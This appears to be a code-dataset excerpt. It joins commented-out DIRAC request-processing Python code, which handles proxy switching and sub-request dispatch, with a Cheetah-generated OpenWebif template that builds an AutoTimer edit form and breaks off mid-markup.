# self.warn = self.__log.warn
# self.error = self.__log.error
# self.exception = self.__log.exception
# self.fatal = self.__log.fatal
#
# from DIRAC import S_OK, S_ERROR
# from DIRAC.ConfigurationSystem.Client.Config import gConfig
# from DIRAC.FrameworkSystem.Client.ProxyManagerClient import gProxyManager
# from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getGroupsWithVOMSAttribute
# from DIRAC.ConfigurationSystem.Client.ConfigurationData import gConfigurationData
# from DIRAC.DataManagementSystem.Client.DataManager import DataManager
# from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
#
#
# # # export DIRAC global tools and functions
# self.makeGlobal( "S_OK", S_OK )
# self.makeGlobal( "S_ERROR", S_ERROR )
# self.makeGlobal( "gLogger", gLogger )
# self.makeGlobal( "gConfig", gConfig )
# self.makeGlobal( "gProxyManager", gProxyManager )
# self.makeGlobal( "getGroupsWithVOMSAttribute", getGroupsWithVOMSAttribute )
# self.makeGlobal( "gConfigurationData", gConfigurationData )
#
# # # save request string
# self.requestString = requestString
# # # build request object
# from DIRAC.RequestManagementSystem.Client.RequestContainer import RequestContainer
# self.requestObj = RequestContainer( init = False )
# self.requestObj.parseRequest( request = self.requestString )
# # # save request name
# self.requestName = requestName
# # # .. and jobID
# self.jobID = jobID
# # # .. and execution order
# self.executionOrder = executionOrder
#
# # # save config path
# self.__configPath = configPath
# # # set requestType
# self.setRequestType( gConfig.getValue( os.path.join( configPath, "RequestType" ), "" ) )
# # # get log level
# self.__log.setLevel( gConfig.getValue( os.path.join( configPath, self.__class__.__name__, "LogLevel" ), "INFO" ) )
# # # clear monitoring
# self.__monitor = {}
# # # save DataManager proxy
# if "X509_USER_PROXY" in os.environ:
# self.info( "saving path to current proxy file" )
# self.__dataManagerProxy = os.environ["X509_USER_PROXY"]
# else:
# self.error( "'X509_USER_PROXY' environment variable not set" )
#
# self.fc = FileCatalog()
# self.dm = DataManager()
#
# self.dm = DataManager()
# self.fc = FileCatalog()
#
#
# def dataManagerProxy( self ):
# """ get dataManagerProxy file
#
# :param self: self reference
# """
# return self.__dataManagerProxy
#
# def addMark( self, name, value = 1 ):
# """ add mark to __monitor dict
#
# :param self: self reference
# :param name: mark name
# :param value: value to be
#
# """
# if name not in self.__monitor:
# self.__monitor.setdefault( name, 0 )
# self.__monitor[name] += value
#
# def monitor( self ):
# """ get monitoring dict
#
# :param cls: class reference
# """
# return self.__monitor
#
# def makeGlobal( self, objName, objDef ):
# """ export :objDef: to global name space using :objName: name
#
# :param self: self reference
# :param str objName: symbol name
# :param mixed objDef: symbol definition
# :throws: NameError if symbol of that name is already in
# """
# if objName not in __builtins__:
# if type( __builtins__ ) == type( {} ):
# __builtins__[objName] = objDef
# else:
# setattr( __builtins__, objName, objDef )
# return True
#
# def requestType( self ):
# """ get request type
#
# :params self: self reference
# """
# return self.__requestType
#
# def setRequestType( self, requestType ):
# """ set request type
#
# :param self: self reference
# """
# self.debug( "Setting requestType to %s" % str( requestType ) )
# self.__requestType = requestType
#
#
# @classmethod
# def dataLoggingClient( cls ):
# """ DataLoggingClient getter
# :param cls: class reference
# """
# if not cls.__dataLoggingClient:
# from DIRAC.DataManagementSystem.Client.DataLoggingClient import DataLoggingClient
# cls.__dataLoggingClient = DataLoggingClient()
# return cls.__dataLoggingClient
#
# @classmethod
# def requestClient( cls ):
# """ RequestClient getter
# :param cls: class reference
# """
# if not cls.__requestClient:
# from DIRAC.Core.DISET.RPCClient import RPCClient
# from DIRAC.RequestManagementSystem.Client.RequestClient import RequestClient
# cls.__requestClient = RequestClient()
# return cls.__requestClient
#
# @classmethod
# def storageFactory( cls ):
# """ StorageFactory getter
#
# :param cls: class reference
# """
# if not cls.__storageFactory:
# from DIRAC.Resources.Storage.StorageFactory import StorageFactory
# cls.__storageFactory = StorageFactory()
# return cls.__storageFactory
#
# def changeProxy( self, ownerDN, ownerGroup ):
# """ get proxy from gProxyManager, save it to file
#
# :param self: self reference
# :param str ownerDN: request owner DN
# :param str ownerGroup: request owner group
# :return: S_OK with name of newly created owner proxy file
# """
# ownerProxy = gProxyManager.downloadVOMSProxy( str( ownerDN ), str( ownerGroup ) )
# if not ownerProxy["OK"] or not ownerProxy["Value"]:
# reason = ownerProxy["Message"] if "Message" in ownerProxy else "No valid proxy found in ProxyManager."
# return S_ERROR( "Change proxy error for '%s'@'%s': %s" % ( ownerDN, ownerGroup, reason ) )
# ownerProxyFile = ownerProxy["Value"].dumpAllToFile()
# if not ownerProxyFile["OK"]:
# return S_ERROR( ownerProxyFile["Message"] )
# ownerProxyFile = ownerProxyFile["Value"]
# os.environ["X509_USER_PROXY"] = ownerProxyFile
# return S_OK( ownerProxyFile )
#
# ######################################################################
# # operationDispatcher
# @classmethod
# def operationDispatcher( cls ):
# """ operation dispatcher getter
#
# :param cls: class reference
# """
# return cls.__operationDispatcher
#
# @classmethod
# def addOperationAction( cls, operation, methodToRun, overwrite = True ):
# """ register handler :methodToRun: for SubRequest operation :operation:
# :warn: all handlers should have the same signature
# :param self: self reference
# :param str operation: SubRequest operation name
# :param MethodType methodToRun: handler to be executed for SubRequest
# :param bool overwrite: flag to overwrite handler, if already present
# :return: S_OK/S_ERROR
#
# Every action handler should return S_OK with of a structure::
#
# { "OK" : True,
# "Value" : requestObj # that has been sent to operation handler
# }
#
# otherwise S_ERROR.
#
# """
# if operation in cls.__operationDispatcher and not overwrite:
# return S_ERROR( "addOperationAction: operation for '%s' is already registered" % operation )
# if type( methodToRun ) is not MethodType:
# return S_ERROR( "addOperationAction: wrong type (%s = types.MethodType) for '%s' operation" % \
# ( str( type( methodToRun ) ), operation ) )
# cls.__operationDispatcher[operation] = methodToRun
# return S_OK()
#
# def __call__( self ):
# """ generic function to process one Request of a type requestType
#
# This method could be run in a thread.
#
# :param self: self reference
# :param str requestType: request type
# :return: S_OK/S_ERROR
# """
# self.always( "executing request %s" % self.requestName )
#
# ################################################################
# # # get ownerDN and ownerGroup
# ownerDN = self.requestObj.getAttribute( "OwnerDN" )
# if not ownerDN["OK"]:
# return ownerDN
# ownerDN = ownerDN["Value"]
# ownerGroup = self.requestObj.getAttribute( "OwnerGroup" )
# if not ownerGroup["OK"]:
# return ownerGroup
# ownerGroup = ownerGroup["Value"]
#
# # # save request owner
# self.requestOwnerDN = ownerDN if ownerDN else ""
# self.requestOwnerGroup = ownerGroup if ownerGroup else ""
#
# #################################################################
# # # change proxy
# ownerProxyFile = None
# if ownerDN and ownerGroup:
# ownerProxyFile = self.changeProxy( ownerDN, ownerGroup )
# if not ownerProxyFile["OK"]:
# self.error( "handleReuqest: unable to get proxy for '%s'@'%s': %s" % ( ownerDN,
# ownerGroup,
# ownerProxyFile["Message"] ) )
# # update = self.putBackRequest( self.requestName, self.requestString )
# # if not update["OK"]:
# # self.error( "handleRequest: error when updating request: %s" % update["Message"] )
# # return update
# # return ownerProxyFile
# ownerProxyFile = None
# else:
# ownerProxyFile = ownerProxyFile["Value"]
# if ownerProxyFile:
# # self.ownerProxyFile = ownerProxyFile
# self.info( "Will execute request for '%s'@'%s' using proxy file %s" % ( ownerDN, ownerGroup, ownerProxyFile ) )
# else:
# self.info( "Will execute request for DataManager using her/his proxy" )
#
# #################################################################
# # # execute handlers
# ret = { "OK" : False, "Message" : "" }
# useServerCert = gConfig.useServerCertificate()
# try:
# # Execute task with the owner proxy even for contacting DIRAC services
# if useServerCert:
# gConfigurationData.setOptionInCFG( '/DIRAC/Security/UseServerCertificate', 'false' )
# ret = self.handleRequest()
# finally:
# if useServerCert:
# gConfigurationData.setOptionInCFG( '/DIRAC/Security/UseServerCertificate', 'true' )
# # # delete owner proxy
# if self.__dataManagerProxy:
# os.environ["X509_USER_PROXY"] = self.__dataManagerProxy
# if ownerProxyFile and os.path.exists( ownerProxyFile ):
# os.unlink( ownerProxyFile )
# if not ret["OK"]:
# self.error( "handleRequest: error during request processing: %s" % ret["Message"] )
# self.error( "handleRequest: will put original request back" )
# update = self.putBackRequest( self.requestName, self.requestString )
# if not update["OK"]:
# self.error( "handleRequest: error when putting back request: %s" % update["Message"] )
# # # return at least
# return ret
#
# def handleRequest( self ):
# """ read SubRequests and ExecutionOrder, fire registered handlers upon SubRequests operations
#
# :param self: self reference
# :param dict requestDict: request dictionary as read from self.readRequest
# """
#
# ##############################################################
# # here comes the processing
# ##############################################################
# res = self.requestObj.getNumSubRequests( self.__requestType )
# if not res["OK"]:
# errMsg = "handleRequest: failed to obtain number of '%s' subrequests." % self.__requestType
# self.error( errMsg, res["Message"] )
# return S_ERROR( res["Message"] )
#
# # # for gMonitor
# self.addMark( "Execute", 1 )
# # # process sub requests
# for index in range( res["Value"] ):
# self.info( "handleRequest: processing subrequest %s." % str( index ) )
# subRequestAttrs = self.requestObj.getSubRequestAttributes( index, self.__requestType )["Value"]
# if subRequestAttrs["ExecutionOrder"]:
# subExecutionOrder = int( subRequestAttrs["ExecutionOrder"] )
# else:
# subExecutionOrder = 0
# subRequestStatus = subRequestAttrs["Status"]
# if subRequestStatus != "Waiting":
# self.info( "handleRequest: subrequest %s has status '%s' and is not to be executed." % ( str( index ),
# subRequestStatus ) )
# continue
#
# if subExecutionOrder <= self.executionOrder:
# operation = subRequestAttrs["Operation"]
# if operation not in self.operationDispatcher():
# self.error( "handleRequest: '%s' operation not supported" % operation )
# else:
# self.info( "handleRequest: will execute %s '%s' subrequest" % ( str( index ), operation ) )
#
# # # get files
# subRequestFiles = self.requestObj.getSubRequestFiles( index, self.__requestType )["Value"]
# # # execute operation action
# ret = self.operationDispatcher()[operation].__call__( index,
# self.requestObj,
# subRequestAttrs,
# subRequestFiles )
# ################################################
# # # error in operation action?
# if not ret["OK"]:
# self.error( "handleRequest: error when handling subrequest %s: %s" % ( str( index ), ret["Message"] ) )
# self.requestObj.setSubRequestAttributeValue( index, self.__requestType, "Error", ret["Message"] )
# else:
# # # update ref to requestObj
# self.requestObj = ret["Value"]
# # # check if subrequest status == Done, disable finalisation if not
# subRequestDone = self.requestObj.isSubRequestDone( index, self.__requestType )
# if not subRequestDone["OK"]:
# self.error( "handleRequest: unable to determine subrequest status: %s" % subRequestDone["Message"] )
# else:
# if not subRequestDone["Value"]:
# self.warn( "handleRequest: subrequest %s is not done yet" % str( index ) )
#
# ################################################
# # Generate the new request string after operation
# newRequestString = self.requestObj.toXML()['Value']
# update = self.putBackRequest( self.requestName, newRequestString )
# if not update["OK"]:
# self.error( "handleRequest: error when updating request: %s" % update["Message"] )
# return update
#
# # # get request status
# if self.jobID:
# requestStatus = self.requestClient().getRequestStatus( self.requestName )
# if not requestStatus["OK"]:
# return requestStatus
# requestStatus = requestStatus["Value"]
# # # finalize request if jobID is present and request status = 'Done'
# self.info( "handleRequest: request status is %s" % requestStatus )
#
# if ( requestStatus["RequestStatus"] == "Done" ) and ( requestStatus["SubRequestStatus"] not in ( "Waiting", "Assigned" ) ):
# self.debug( "handleRequest: request is going to be finalised" )
# finalize = self.requestClient().finalizeRequest( self.requestName, self.jobID )
# if not finalize["OK"]:
# self.error( "handleRequest: error in request finalization: %s" % finalize["Message"] )
# return finalize
# self.info( "handleRequest: request is finalised" )
# # # for gMonitor
# self.addMark( "Done", 1 )
#
# # # should return S_OK with monitor dict
# return S_OK( { "monitor" : self.monitor() } )
#
# def putBackRequest( self, requestName, requestString ):
# """ put request back
#
# :param self: self reference
# :param str requestName: request name
# :param str requestString: XML-serialised request
# :param str sourceServer: request server URL
# """
# update = self.requestClient().updateRequest( requestName, requestString )
# if not update["OK"]:
# self.error( "putBackRequest: error when updating request: %s" % update["Message"] )
# return update
# return S_OK()
|
calancha/DIRAC
|
DataManagementSystem/private/RequestTask.py
|
Python
|
gpl-3.0
| 21,374
|
[
"DIRAC"
] |
f9c8c3d41e9cdce05a6686ffd519007f58c6ccefa6d3b0a95a32a327cf403ade
|
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
from Plugins.Extensions.OpenWebif.local import tstrings
##################################################
## MODULE CONSTANTS
# Short aliases for Cheetah's NameMapper lookup helpers, used throughout the
# generated respond() method below.
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
# Cheetah compiler provenance metadata (autogenerated -- do not edit by hand).
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1453357629.571931
__CHEETAH_genTimestamp__ = 'Thu Jan 21 15:27:09 2016'
__CHEETAH_src__ = '/home/babel/Build/Test/OpenPLi5/openpli5.0/build/tmp/work/tmnanoseplus-oe-linux/enigma2-plugin-extensions-openwebif/1+gitAUTOINC+186ea358f6-r0/git/plugin/controllers/views/ajax/at.tmpl'
__CHEETAH_srcLastModified__ = 'Thu Jan 21 15:27:08 2016'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
# Refuse to run a template compiled against an incompatibly old Cheetah.
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
    raise AssertionError(
        'This template was compiled with Cheetah version'
        ' %s. Templates compiled before version %s must be recompiled.'%(
            __CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class at(Template):
##################################################
## CHEETAH GENERATED METHODS
    def __init__(self, *args, **KWs):
        # Autogenerated Cheetah constructor: delegate to Template.__init__,
        # then perform one-time Cheetah instance setup if not already done.
        super(at, self).__init__(*args, **KWs)
        if not self._CHEETAH__instanceInitialized:
            # Only a whitelisted subset of keyword arguments is meaningful to
            # the Cheetah runtime; any others are silently ignored here.
            cheetahKWArgs = {}
            allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
            for k,v in KWs.items():
                if k in allowedKWs: cheetahKWArgs[k] = v
            self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_54425158 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<style>
#atlist .ui-selecting { background: #FECA40; }
#atlist .ui-selected { background: #F39814; color: white; }
#atlist { list-style-type: none; margin: 0; padding: 0; }
#atlist li { margin: 3px; padding: 0.4em; font-size: 1.1em; height: 16px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap;}
optgroup {font-weight: bolder;}
fieldset > label
{
\t-webkit-margin-top-collapse: separate;
\tmargin-top: 1.5em;
\tdisplay: inline-block;
}
</style>
<div id="content_main" style="min-height: 500px;">
\t<div id="info">
\t\t<div style="background-color: #00000">
\t\t<div style="display: inline-block; width: 100%; zoom: 1;">
\t\t\t<div style="float:left;width:200px;">
\t\t\t\t<h3>''')
_v = VFFSL(SL,"tstrings",True)['at_list'] # u"$tstrings['at_list']" on line 22, col 9
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_list']")) # from line 22, col 9.
write(u'''</h3>
\t\t\t\t<ol id="atlist">
\t\t\t\t</ol>
\t\t\t\t
\t\t\t</div>
\t\t\t<div style="margin-left:200px;">
\t\t\t\t<div style="display: inline-block; width: 100%; zoom: 1;">
\t\t\t\t\t<h3>''')
_v = VFFSL(SL,"tstrings",True)['at_at_edit'] # u"$tstrings['at_at_edit']" on line 29, col 10
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_at_edit']")) # from line 29, col 10.
write(u''' <span id=\'at_name\'></span></h3>
\t\t\t\t\t<div id="ateditcontent">
\t\t\t\t\t\t<form>
\t\t\t\t\t\t\t<fieldset>
\t\t\t\t\t\t\t\t<br><label for="enabled">''')
_v = VFFSL(SL,"tstrings",True)['at_enabled'] # u"$tstrings['at_enabled']" on line 33, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_enabled']")) # from line 33, col 34.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="enabled" id="enabled" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<br><label for="name">''')
_v = VFFSL(SL,"tstrings",True)['at_description'] # u"$tstrings['at_description']" on line 35, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_description']")) # from line 35, col 31.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="text" name="name" id="name" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<br><label for="match">''')
_v = VFFSL(SL,"tstrings",True)['at_title_match'] # u"$tstrings['at_title_match']" on line 37, col 32
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_title_match']")) # from line 37, col 32.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="text" name="match" id="match" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<!-- <label for="searchType">''')
_v = VFFSL(SL,"tstrings",True)['at_search_type'] # u"$tstrings['at_search_type']" on line 39, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_search_type']")) # from line 39, col 38.
write(u''':</label> -->
\t\t\t\t\t\t\t\t<select name="searchType" id="searchType">
\t\t\t\t\t\t\t\t<option value="partial" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_partial_match'] # u"$tstrings['at_partial_match']" on line 41, col 53
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_partial_match']")) # from line 41, col 53.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="exact">''')
_v = VFFSL(SL,"tstrings",True)['at_exact_match'] # u"$tstrings['at_exact_match']" on line 42, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_exact_match']")) # from line 42, col 31.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="description">''')
_v = VFFSL(SL,"tstrings",True)['at_description_match'] # u"$tstrings['at_description_match']" on line 43, col 37
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_description_match']")) # from line 43, col 37.
write(u'''</option>
''')
if VFN(VFFSL(SL,"types",True),"has_key",False)('start'): # generated from line 44, col 9
write(u'''\t\t\t\t\t\t\t\t\t<option value="start">''')
_v = VFFSL(SL,"tstrings",True)['at_start_match'] # u"$tstrings['at_start_match']" on line 45, col 32
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_start_match']")) # from line 45, col 32.
write(u'''</option>
''')
write(u'''\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<!-- <br><label for="searchCase">''')
_v = VFFSL(SL,"tstrings",True)['at_search_strictness'] # u"$tstrings['at_search_strictness']" on line 48, col 42
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_search_strictness']")) # from line 48, col 42.
write(u''':</label> -->
\t\t\t\t\t\t\t\t<select name="searchCase" id="searchCase">
\t\t\t\t\t\t\t\t<option value="sensitive" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_case_sensitive'] # u"$tstrings['at_case_sensitive']" on line 50, col 55
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_case_sensitive']")) # from line 50, col 55.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="insensitive">''')
_v = VFFSL(SL,"tstrings",True)['at_case_insensitive'] # u"$tstrings['at_case_insensitive']" on line 51, col 37
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_case_insensitive']")) # from line 51, col 37.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<br><label for="justplay">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_type'] # u"$tstrings['at_timer_type']" on line 53, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_type']")) # from line 53, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="justplay" id="justplay">
\t\t\t\t\t\t\t\t<option value="0" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_record'] # u"$tstrings['at_record']" on line 55, col 47
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_record']")) # from line 55, col 47.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="1">''')
_v = VFFSL(SL,"tstrings",True)['at_zap'] # u"$tstrings['at_zap']" on line 56, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_zap']")) # from line 56, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<label for="overrideAlternatives">''')
_v = VFFSL(SL,"tstrings",True)['at_override_alt'] # u"$tstrings['at_override_alt']" on line 58, col 43
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_override_alt']")) # from line 58, col 43.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="overrideAlternatives" id="overrideAlternatives" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<br><label for="timeSpan">''')
_v = VFFSL(SL,"tstrings",True)['at_timespan'] # u"$tstrings['at_timespan']" on line 60, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timespan']")) # from line 60, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timeSpan" id="timeSpan" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timeSpanE">
\t\t\t\t\t\t\t\t\t<label for="from">''')
_v = VFFSL(SL,"tstrings",True)['at_timespan_begin'] # u"$tstrings['at_timespan_begin']" on line 63, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timespan_begin']")) # from line 63, col 28.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="from" id="from" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<label for="to">''')
_v = VFFSL(SL,"tstrings",True)['at_timespan_end'] # u"$tstrings['at_timespan_end']" on line 65, col 26
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timespan_end']")) # from line 65, col 26.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="to" id="to" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="timeFrame">''')
_v = VFFSL(SL,"tstrings",True)['at_datespan'] # u"$tstrings['at_datespan']" on line 68, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_datespan']")) # from line 68, col 36.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timeFrame" id="timeFrame" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timeFrameE">
\t\t\t\t\t\t\t\t\t<label for="after">''')
_v = VFFSL(SL,"tstrings",True)['at_datespan_before'] # u"$tstrings['at_datespan_before']" on line 71, col 29
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_datespan_before']")) # from line 71, col 29.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="after" id="after" value="" class="text date ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<input type="checkbox" name="timeFrameAfter" id="timeFrameAfter" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<label for="before">''')
_v = VFFSL(SL,"tstrings",True)['at_datespan_after'] # u"$tstrings['at_datespan_after']" on line 74, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_datespan_after']")) # from line 74, col 30.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<span id="beforeE"><input type="text" name="before" id="before" value="" class="text date ui-widget-content ui-corner-all"></span>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="timerOffset">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_offset'] # u"$tstrings['at_timer_offset']" on line 77, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_offset']")) # from line 77, col 38.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timerOffset" id="timerOffset" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timerOffsetE">
\t\t\t\t\t\t\t\t\t<label for="obefore">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_offset_before'] # u"$tstrings['at_timer_offset_before']" on line 80, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_offset_before']")) # from line 80, col 31.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<select name="obefore" id="obefore">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t<label for="oafter">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_offset_after'] # u"$tstrings['at_timer_offset_after']" on line 83, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_offset_after']")) # from line 83, col 30.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<select name="oafter" id="oafter">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="maxDuration">''')
_v = VFFSL(SL,"tstrings",True)['at_max_duration'] # u"$tstrings['at_max_duration']" on line 88, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_max_duration']")) # from line 88, col 38.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="maxDuration" id="maxDuration" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="maxDurationE">
\t\t\t\t\t\t\t\t\t<label for="maxduration"></label>
\t\t\t\t\t\t\t\t\t<select name="maxduration" id="maxduration">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="afterevent">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event'] # u"$tstrings['at_after_event']" on line 96, col 37
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event']")) # from line 96, col 37.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="afterevent" id="afterevent">
\t\t\t\t\t\t\t\t<option value="" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_standard'] # u"$tstrings['at_after_event_standard']" on line 98, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_standard']")) # from line 98, col 46.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="none">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_nothing'] # u"$tstrings['at_after_event_nothing']" on line 99, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_nothing']")) # from line 99, col 30.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="standby">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_standby'] # u"$tstrings['at_after_event_standby']" on line 100, col 33
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_standby']")) # from line 100, col 33.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="shutdown">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_deepstandby'] # u"$tstrings['at_after_event_deepstandby']" on line 101, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_deepstandby']")) # from line 101, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="auto">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_auto'] # u"$tstrings['at_after_event_auto']" on line 102, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_auto']")) # from line 102, col 30.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<br><br><span id="AftereventE">
\t\t\t\t\t\t\t\t<label for="timeSpanAE">''')
_v = VFFSL(SL,"tstrings",True)['at_event_timespan'] # u"$tstrings['at_event_timespan']" on line 105, col 33
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_event_timespan']")) # from line 105, col 33.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timeSpanAE" id="timeSpanAE" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timeSpanAEE">
\t\t\t\t\t\t\t\t\t<br><br><label for="from">''')
_v = VFFSL(SL,"tstrings",True)['at_event_timespan_begin'] # u"$tstrings['at_event_timespan_begin']" on line 108, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_event_timespan_begin']")) # from line 108, col 36.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="aefrom" id="aefrom" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<br><br><label for="to">''')
_v = VFFSL(SL,"tstrings",True)['at_event_timespan_end'] # u"$tstrings['at_event_timespan_end']" on line 110, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_event_timespan_end']")) # from line 110, col 34.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="aeto" id="aeto" value="" class="text ui-widget-content ui-corner-all">
